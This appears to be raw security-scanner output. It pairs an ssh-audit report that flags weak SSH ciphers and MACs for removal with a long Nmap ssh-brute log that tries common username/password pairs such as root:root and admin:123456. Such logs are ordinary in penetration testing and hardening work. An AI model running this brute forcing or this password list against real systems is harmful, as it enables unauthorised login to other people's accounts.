- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-256-96 -- [fail] removed since OpenSSH 6.1, removed from specification
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512-96 -- [fail] removed since OpenSSH 6.1, removed from specification
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 6.0)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
- (rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
- (rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-sha2-256-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- (rec) -hmac-sha2-512-96 -- mac algorithm to remove
- Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-27 02:09 EDT
- NSE: [ssh-run] Failed to specify credentials and command to run.
- NSE: [ssh-brute] Trying username/password pair: root:root
- NSE: [ssh-brute] Trying username/password pair: admin:admin
- NSE: [ssh-brute] Trying username/password pair: administrator:administrator
- NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
- NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
- NSE: [ssh-brute] Trying username/password pair: guest:guest
- NSE: [ssh-brute] Trying username/password pair: user:user
- NSE: [ssh-brute] Trying username/password pair: web:web
- NSE: [ssh-brute] Trying username/password pair: test:test
- NSE: [ssh-brute] Trying username/password pair: root:
- NSE: [ssh-brute] Trying username/password pair: admin:
- NSE: [ssh-brute] Trying username/password pair: administrator:
- NSE: [ssh-brute] Trying username/password pair: webadmin:
- NSE: [ssh-brute] Trying username/password pair: sysadmin:
- NSE: [ssh-brute] Trying username/password pair: netadmin:
- NSE: [ssh-brute] Trying username/password pair: guest:
- NSE: [ssh-brute] Trying username/password pair: user:
- NSE: [ssh-brute] Trying username/password pair: web:
- NSE: [ssh-brute] Trying username/password pair: test:
- NSE: [ssh-brute] Trying username/password pair: root:123456
- NSE: [ssh-brute] Trying username/password pair: admin:123456
- NSE: [ssh-brute] Trying username/password pair: administrator:123456
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456
- NSE: [ssh-brute] Trying username/password pair: guest:123456
- NSE: [ssh-brute] Trying username/password pair: user:123456
- NSE: [ssh-brute] Trying username/password pair: web:123456
- NSE: [ssh-brute] Trying username/password pair: test:123456
- NSE: [ssh-brute] Trying username/password pair: root:12345
- NSE: [ssh-brute] Trying username/password pair: admin:12345
- NSE: [ssh-brute] Trying username/password pair: administrator:12345
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345
- NSE: [ssh-brute] Trying username/password pair: guest:12345
- NSE: [ssh-brute] Trying username/password pair: user:12345
- NSE: [ssh-brute] Trying username/password pair: web:12345
- NSE: [ssh-brute] Trying username/password pair: test:12345
- NSE: [ssh-brute] Trying username/password pair: root:123456789
- NSE: [ssh-brute] Trying username/password pair: admin:123456789
- NSE: [ssh-brute] Trying username/password pair: administrator:123456789
- NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
- NSE: [ssh-brute] Trying username/password pair: guest:123456789
- NSE: [ssh-brute] Trying username/password pair: user:123456789
- NSE: [ssh-brute] Trying username/password pair: web:123456789
- NSE: [ssh-brute] Trying username/password pair: test:123456789
- NSE: [ssh-brute] Trying username/password pair: root:password
- NSE: [ssh-brute] Trying username/password pair: admin:password
- NSE: [ssh-brute] Trying username/password pair: administrator:password
- NSE: [ssh-brute] Trying username/password pair: webadmin:password
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password
- NSE: [ssh-brute] Trying username/password pair: netadmin:password
- NSE: [ssh-brute] Trying username/password pair: guest:password
- NSE: [ssh-brute] Trying username/password pair: user:password
- NSE: [ssh-brute] Trying username/password pair: web:password
- NSE: [ssh-brute] Trying username/password pair: test:password
- NSE: [ssh-brute] Trying username/password pair: root:iloveyou
- NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
- NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
- NSE: [ssh-brute] Trying username/password pair: user:iloveyou
- NSE: [ssh-brute] Trying username/password pair: web:iloveyou
- NSE: [ssh-brute] Trying username/password pair: test:iloveyou
- NSE: [ssh-brute] Trying username/password pair: root:princess
- NSE: [ssh-brute] Trying username/password pair: admin:princess
- NSE: [ssh-brute] Trying username/password pair: administrator:princess
- NSE: [ssh-brute] Trying username/password pair: webadmin:princess
- NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
- NSE: [ssh-brute] Trying username/password pair: netadmin:princess
- NSE: [ssh-brute] Trying username/password pair: guest:princess
- NSE: [ssh-brute] Trying username/password pair: user:princess
- NSE: [ssh-brute] Trying username/password pair: web:princess
- NSE: [ssh-brute] Trying username/password pair: test:princess
- NSE: [ssh-brute] Trying username/password pair: root:12345678
- NSE: [ssh-brute] Trying username/password pair: admin:12345678
- NSE: [ssh-brute] Trying username/password pair: administrator:12345678
- NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
- NSE: [ssh-brute] Trying username/password pair: guest:12345678
- NSE: [ssh-brute] Trying username/password pair: user:12345678
- NSE: [ssh-brute] Trying username/password pair: web:12345678
- NSE: [ssh-brute] Trying username/password pair: test:12345678
- NSE: [ssh-brute] Trying username/password pair: root:1234567
- NSE: [ssh-brute] Trying username/password pair: admin:1234567
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
- NSE: [ssh-brute] Trying username/password pair: guest:1234567
- NSE: [ssh-brute] Trying username/password pair: user:1234567
- NSE: [ssh-brute] Trying username/password pair: web:1234567
- NSE: [ssh-brute] Trying username/password pair: test:1234567
- NSE: [ssh-brute] Trying username/password pair: root:abc123
- NSE: [ssh-brute] Trying username/password pair: admin:abc123
- NSE: [ssh-brute] Trying username/password pair: administrator:abc123
- NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
- NSE: [ssh-brute] Trying username/password pair: guest:abc123
- NSE: [ssh-brute] Trying username/password pair: user:abc123
- NSE: [ssh-brute] Trying username/password pair: web:abc123
- NSE: [ssh-brute] Trying username/password pair: test:abc123
- NSE: [ssh-brute] Trying username/password pair: root:nicole
- NSE: [ssh-brute] Trying username/password pair: admin:nicole
- NSE: [ssh-brute] Trying username/password pair: administrator:nicole
- NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
- NSE: [ssh-brute] Trying username/password pair: guest:nicole
- NSE: [ssh-brute] Trying username/password pair: user:nicole
- NSE: [ssh-brute] Trying username/password pair: web:nicole
- NSE: [ssh-brute] Trying username/password pair: test:nicole
- NSE: [ssh-brute] Trying username/password pair: root:daniel
- NSE: [ssh-brute] Trying username/password pair: admin:daniel
- NSE: [ssh-brute] Trying username/password pair: administrator:daniel
- NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
- NSE: [ssh-brute] Trying username/password pair: guest:daniel
- NSE: [ssh-brute] Trying username/password pair: user:daniel
- NSE: [ssh-brute] Trying username/password pair: web:daniel
- NSE: [ssh-brute] Trying username/password pair: test:daniel
- NSE: [ssh-brute] Trying username/password pair: root:monkey
- NSE: [ssh-brute] Trying username/password pair: admin:monkey
- NSE: [ssh-brute] Trying username/password pair: administrator:monkey
- NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
- NSE: [ssh-brute] Trying username/password pair: guest:monkey
- NSE: [ssh-brute] Trying username/password pair: user:monkey
- NSE: [ssh-brute] Trying username/password pair: web:monkey
- NSE: [ssh-brute] Trying username/password pair: test:monkey
- NSE: [ssh-brute] Trying username/password pair: root:babygirl
- NSE: [ssh-brute] Trying username/password pair: admin:babygirl
- NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
- NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
- NSE: [ssh-brute] Trying username/password pair: guest:babygirl
- NSE: [ssh-brute] Trying username/password pair: user:babygirl
- NSE: [ssh-brute] Trying username/password pair: web:babygirl
- NSE: [ssh-brute] Trying username/password pair: test:babygirl
- NSE: [ssh-brute] Trying username/password pair: root:qwerty
- NSE: [ssh-brute] Trying username/password pair: admin:qwerty
- NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
- NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
- NSE: [ssh-brute] Trying username/password pair: guest:qwerty
- NSE: [ssh-brute] Trying username/password pair: user:qwerty
- NSE: [ssh-brute] Trying username/password pair: web:qwerty
- NSE: [ssh-brute] Trying username/password pair: test:qwerty
- NSE: [ssh-brute] Trying username/password pair: root:lovely
- NSE: [ssh-brute] Trying username/password pair: admin:lovely
- NSE: [ssh-brute] Trying username/password pair: administrator:lovely
- NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
- NSE: [ssh-brute] Trying username/password pair: guest:lovely
- NSE: [ssh-brute] Trying username/password pair: user:lovely
- NSE: [ssh-brute] Trying username/password pair: web:lovely
- NSE: [ssh-brute] Trying username/password pair: test:lovely
- NSE: [ssh-brute] Trying username/password pair: root:654321
- NSE: [ssh-brute] Trying username/password pair: admin:654321
- NSE: [ssh-brute] Trying username/password pair: administrator:654321
- NSE: [ssh-brute] Trying username/password pair: webadmin:654321
- NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
- NSE: [ssh-brute] Trying username/password pair: netadmin:654321
- NSE: [ssh-brute] Trying username/password pair: guest:654321
- NSE: [ssh-brute] Trying username/password pair: user:654321
- NSE: [ssh-brute] Trying username/password pair: web:654321
- NSE: [ssh-brute] Trying username/password pair: test:654321
- NSE: [ssh-brute] Trying username/password pair: root:michael
- NSE: [ssh-brute] Trying username/password pair: admin:michael
- NSE: [ssh-brute] Trying username/password pair: administrator:michael
- NSE: [ssh-brute] Trying username/password pair: webadmin:michael
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
- NSE: [ssh-brute] Trying username/password pair: netadmin:michael
- NSE: [ssh-brute] Trying username/password pair: guest:michael
- NSE: [ssh-brute] Trying username/password pair: user:michael
- NSE: [ssh-brute] Trying username/password pair: web:michael
- NSE: [ssh-brute] Trying username/password pair: test:michael
- NSE: [ssh-brute] Trying username/password pair: root:jessica
- NSE: [ssh-brute] Trying username/password pair: admin:jessica
- NSE: [ssh-brute] Trying username/password pair: administrator:jessica
- NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
- NSE: [ssh-brute] Trying username/password pair: guest:jessica
- NSE: [ssh-brute] Trying username/password pair: user:jessica
- NSE: [ssh-brute] Trying username/password pair: web:jessica
- NSE: [ssh-brute] Trying username/password pair: test:jessica
- NSE: [ssh-brute] Trying username/password pair: root:111111
- NSE: [ssh-brute] Trying username/password pair: admin:111111
- NSE: [ssh-brute] Trying username/password pair: administrator:111111
- NSE: [ssh-brute] Trying username/password pair: webadmin:111111
- NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
- NSE: [ssh-brute] Trying username/password pair: netadmin:111111
- NSE: [ssh-brute] Trying username/password pair: guest:111111
- NSE: [ssh-brute] Trying username/password pair: user:111111
- NSE: [ssh-brute] Trying username/password pair: web:111111
- NSE: [ssh-brute] Trying username/password pair: test:111111
- NSE: [ssh-brute] Trying username/password pair: root:ashley
- NSE: [ssh-brute] Trying username/password pair: admin:ashley
- NSE: [ssh-brute] Trying username/password pair: administrator:ashley
- NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
- NSE: [ssh-brute] Trying username/password pair: guest:ashley
- NSE: [ssh-brute] Trying username/password pair: user:ashley
- NSE: [ssh-brute] Trying username/password pair: web:ashley
- NSE: [ssh-brute] Trying username/password pair: test:ashley
- NSE: [ssh-brute] Trying username/password pair: root:000000
- NSE: [ssh-brute] Trying username/password pair: admin:000000
- NSE: [ssh-brute] Trying username/password pair: administrator:000000
- NSE: [ssh-brute] Trying username/password pair: webadmin:000000
- NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
- NSE: [ssh-brute] Trying username/password pair: netadmin:000000
- NSE: [ssh-brute] Trying username/password pair: guest:000000
- NSE: [ssh-brute] Trying username/password pair: user:000000
- NSE: [ssh-brute] Trying username/password pair: web:000000
- NSE: [ssh-brute] Trying username/password pair: test:000000
- NSE: [ssh-brute] Trying username/password pair: root:iloveu
- NSE: [ssh-brute] Trying username/password pair: admin:iloveu
- NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
- NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
- NSE: [ssh-brute] Trying username/password pair: guest:iloveu
- NSE: [ssh-brute] Trying username/password pair: user:iloveu
- NSE: [ssh-brute] Trying username/password pair: web:iloveu
- NSE: [ssh-brute] Trying username/password pair: test:iloveu
- NSE: [ssh-brute] Trying username/password pair: root:michelle
- NSE: [ssh-brute] Trying username/password pair: admin:michelle
- NSE: [ssh-brute] Trying username/password pair: administrator:michelle
- NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: netadmin:michelle
- NSE: [ssh-brute] Trying username/password pair: guest:michelle
- NSE: [ssh-brute] Trying username/password pair: user:michelle
- NSE: [ssh-brute] Trying username/password pair: web:michelle
- NSE: [ssh-brute] Trying username/password pair: test:michelle
- NSE: [ssh-brute] Trying username/password pair: root:tigger
- NSE: [ssh-brute] Trying username/password pair: admin:tigger
- NSE: [ssh-brute] Trying username/password pair: administrator:tigger
- NSE: [ssh-brute] Trying username/password pair: webadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: sysadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: netadmin:tigger
- NSE: [ssh-brute] Trying username/password pair: guest:tigger
- NSE: [ssh-brute] Trying username/password pair: user:tigger
- NSE: [ssh-brute] Trying username/password pair: web:tigger
- NSE: [ssh-brute] Trying username/password pair: test:tigger
- NSE: [ssh-brute] Trying username/password pair: root:sunshine
- NSE: [ssh-brute] Trying username/password pair: admin:sunshine
- NSE: [ssh-brute] Trying username/password pair: administrator:sunshine
- NSE: [ssh-brute] Trying username/password pair: webadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: sysadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: netadmin:sunshine
- NSE: [ssh-brute] Trying username/password pair: guest:sunshine
- NSE: [ssh-brute] Trying username/password pair: user:sunshine
- NSE: [ssh-brute] Trying username/password pair: web:sunshine
- NSE: [ssh-brute] Trying username/password pair: test:sunshine
- NSE: [ssh-brute] Trying username/password pair: root:chocolate
- NSE: [ssh-brute] Trying username/password pair: admin:chocolate
- NSE: [ssh-brute] Trying username/password pair: administrator:chocolate
- NSE: [ssh-brute] Trying username/password pair: webadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: sysadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: netadmin:chocolate
- NSE: [ssh-brute] Trying username/password pair: guest:chocolate
- NSE: [ssh-brute] Trying username/password pair: user:chocolate
- NSE: [ssh-brute] Trying username/password pair: web:chocolate
- NSE: [ssh-brute] Trying username/password pair: test:chocolate
- NSE: [ssh-brute] Trying username/password pair: root:password1
- NSE: [ssh-brute] Trying username/password pair: admin:password1
- NSE: [ssh-brute] Trying username/password pair: administrator:password1
- NSE: [ssh-brute] Trying username/password pair: webadmin:password1
- NSE: [ssh-brute] Trying username/password pair: sysadmin:password1
- NSE: [ssh-brute] Trying username/password pair: netadmin:password1
- NSE: [ssh-brute] Trying username/password pair: guest:password1
- NSE: [ssh-brute] Trying username/password pair: user:password1
- NSE: [ssh-brute] Trying username/password pair: web:password1
- NSE: [ssh-brute] Trying username/password pair: test:password1
- NSE: [ssh-brute] Trying username/password pair: root:soccer
- NSE: [ssh-brute] Trying username/password pair: admin:soccer
- NSE: [ssh-brute] Trying username/password pair: administrator:soccer
- NSE: [ssh-brute] Trying username/password pair: webadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: netadmin:soccer
- NSE: [ssh-brute] Trying username/password pair: guest:soccer
- NSE: [ssh-brute] Trying username/password pair: user:soccer
- NSE: [ssh-brute] Trying username/password pair: web:soccer
- NSE: [ssh-brute] Trying username/password pair: test:soccer
- NSE: [ssh-brute] Trying username/password pair: root:anthony
- NSE: [ssh-brute] Trying username/password pair: admin:anthony
- NSE: [ssh-brute] Trying username/password pair: administrator:anthony
- NSE: [ssh-brute] Trying username/password pair: webadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: sysadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: netadmin:anthony
- NSE: [ssh-brute] Trying username/password pair: guest:anthony
- NSE: [ssh-brute] Trying username/password pair: user:anthony
- NSE: [ssh-brute] Trying username/password pair: web:anthony
- NSE: [ssh-brute] Trying username/password pair: test:anthony
- NSE: [ssh-brute] Trying username/password pair: root:friends
- NSE: [ssh-brute] Trying username/password pair: admin:friends
- NSE: [ssh-brute] Trying username/password pair: administrator:friends
- NSE: [ssh-brute] Trying username/password pair: webadmin:friends
- NSE: [ssh-brute] Trying username/password pair: sysadmin:friends
- NSE: [ssh-brute] Trying username/password pair: netadmin:friends
- NSE: [ssh-brute] Trying username/password pair: guest:friends
- NSE: [ssh-brute] Trying username/password pair: user:friends
- NSE: [ssh-brute] Trying username/password pair: web:friends
- NSE: [ssh-brute] Trying username/password pair: test:friends
- NSE: [ssh-brute] Trying username/password pair: root:purple
- NSE: [ssh-brute] Trying username/password pair: admin:purple
- NSE: [ssh-brute] Trying username/password pair: administrator:purple
- NSE: [ssh-brute] Trying username/password pair: webadmin:purple
- NSE: [ssh-brute] Trying username/password pair: sysadmin:purple
- NSE: [ssh-brute] Trying username/password pair: netadmin:purple
- NSE: [ssh-brute] Trying username/password pair: guest:purple
- NSE: [ssh-brute] Trying username/password pair: user:purple
- NSE: [ssh-brute] Trying username/password pair: web:purple
- NSE: [ssh-brute] Trying username/password pair: test:purple
- NSE: [ssh-brute] Trying username/password pair: root:angel
- NSE: [ssh-brute] Trying username/password pair: admin:angel
- NSE: [ssh-brute] Trying username/password pair: administrator:angel
- NSE: [ssh-brute] Trying username/password pair: webadmin:angel
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angel
- NSE: [ssh-brute] Trying username/password pair: netadmin:angel
- NSE: [ssh-brute] Trying username/password pair: guest:angel
- NSE: [ssh-brute] Trying username/password pair: user:angel
- NSE: [ssh-brute] Trying username/password pair: web:angel
- NSE: [ssh-brute] Trying username/password pair: test:angel
- NSE: [ssh-brute] Trying username/password pair: root:butterfly
- NSE: [ssh-brute] Trying username/password pair: admin:butterfly
- NSE: [ssh-brute] Trying username/password pair: administrator:butterfly
- NSE: [ssh-brute] Trying username/password pair: webadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: sysadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: netadmin:butterfly
- NSE: [ssh-brute] Trying username/password pair: guest:butterfly
- NSE: [ssh-brute] Trying username/password pair: user:butterfly
- NSE: [ssh-brute] Trying username/password pair: web:butterfly
- NSE: [ssh-brute] Trying username/password pair: test:butterfly
- NSE: [ssh-brute] Trying username/password pair: root:jordan
- NSE: [ssh-brute] Trying username/password pair: admin:jordan
- NSE: [ssh-brute] Trying username/password pair: administrator:jordan
- NSE: [ssh-brute] Trying username/password pair: webadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: netadmin:jordan
- NSE: [ssh-brute] Trying username/password pair: guest:jordan
- NSE: [ssh-brute] Trying username/password pair: user:jordan
- NSE: [ssh-brute] Trying username/password pair: web:jordan
- NSE: [ssh-brute] Trying username/password pair: test:jordan
- NSE: [ssh-brute] Trying username/password pair: root:fuckyou
- NSE: [ssh-brute] Trying username/password pair: admin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: administrator:fuckyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:fuckyou
- NSE: [ssh-brute] Trying username/password pair: guest:fuckyou
- NSE: [ssh-brute] Trying username/password pair: user:fuckyou
- NSE: [ssh-brute] Trying username/password pair: web:fuckyou
- NSE: [ssh-brute] Trying username/password pair: test:fuckyou
- NSE: [ssh-brute] Trying username/password pair: root:123123
- NSE: [ssh-brute] Trying username/password pair: admin:123123
- NSE: [ssh-brute] Trying username/password pair: administrator:123123
- NSE: [ssh-brute] Trying username/password pair: webadmin:123123
- NSE: [ssh-brute] Trying username/password pair: sysadmin:123123
- NSE: [ssh-brute] Trying username/password pair: netadmin:123123
- NSE: [ssh-brute] Trying username/password pair: guest:123123
- NSE: [ssh-brute] Trying username/password pair: user:123123
- NSE: [ssh-brute] Trying username/password pair: web:123123
- NSE: [ssh-brute] Trying username/password pair: test:123123
- NSE: [ssh-brute] Trying username/password pair: root:justin
- NSE: [ssh-brute] Trying username/password pair: admin:justin
- NSE: [ssh-brute] Trying username/password pair: administrator:justin
- NSE: [ssh-brute] Trying username/password pair: webadmin:justin
- NSE: [ssh-brute] Trying username/password pair: sysadmin:justin
- NSE: [ssh-brute] Trying username/password pair: netadmin:justin
- NSE: [ssh-brute] Trying username/password pair: guest:justin
- NSE: [ssh-brute] Trying username/password pair: user:justin
- NSE: [ssh-brute] Trying username/password pair: web:justin
- NSE: [ssh-brute] Trying username/password pair: test:justin
- NSE: [ssh-brute] Trying username/password pair: root:liverpool
- NSE: [ssh-brute] Trying username/password pair: admin:liverpool
- NSE: [ssh-brute] Trying username/password pair: administrator:liverpool
- NSE: [ssh-brute] Trying username/password pair: webadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: sysadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: netadmin:liverpool
- NSE: [ssh-brute] Trying username/password pair: guest:liverpool
- NSE: [ssh-brute] Trying username/password pair: user:liverpool
- NSE: [ssh-brute] Trying username/password pair: web:liverpool
- NSE: [ssh-brute] Trying username/password pair: test:liverpool
- NSE: [ssh-brute] Trying username/password pair: root:football
- NSE: [ssh-brute] Trying username/password pair: admin:football
- NSE: [ssh-brute] Trying username/password pair: administrator:football
- NSE: [ssh-brute] Trying username/password pair: webadmin:football
- NSE: [ssh-brute] Trying username/password pair: sysadmin:football
- NSE: [ssh-brute] Trying username/password pair: netadmin:football
- NSE: [ssh-brute] Trying username/password pair: guest:football
- NSE: [ssh-brute] Trying username/password pair: user:football
- NSE: [ssh-brute] Trying username/password pair: web:football
- NSE: [ssh-brute] Trying username/password pair: test:football
- NSE: [ssh-brute] Trying username/password pair: root:loveme
- NSE: [ssh-brute] Trying username/password pair: admin:loveme
- NSE: [ssh-brute] Trying username/password pair: administrator:loveme
- NSE: [ssh-brute] Trying username/password pair: webadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: sysadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: netadmin:loveme
- NSE: [ssh-brute] Trying username/password pair: guest:loveme
- NSE: [ssh-brute] Trying username/password pair: user:loveme
- NSE: [ssh-brute] Trying username/password pair: web:loveme
- NSE: [ssh-brute] Trying username/password pair: test:loveme
- NSE: [ssh-brute] Trying username/password pair: root:secret
- NSE: [ssh-brute] Trying username/password pair: admin:secret
- NSE: [ssh-brute] Trying username/password pair: administrator:secret
- NSE: [ssh-brute] Trying username/password pair: webadmin:secret
- NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
- NSE: [ssh-brute] Trying username/password pair: netadmin:secret
- NSE: [ssh-brute] Trying username/password pair: guest:secret
- NSE: [ssh-brute] Trying username/password pair: user:secret
- NSE: [ssh-brute] Trying username/password pair: web:secret
- NSE: [ssh-brute] Trying username/password pair: test:secret
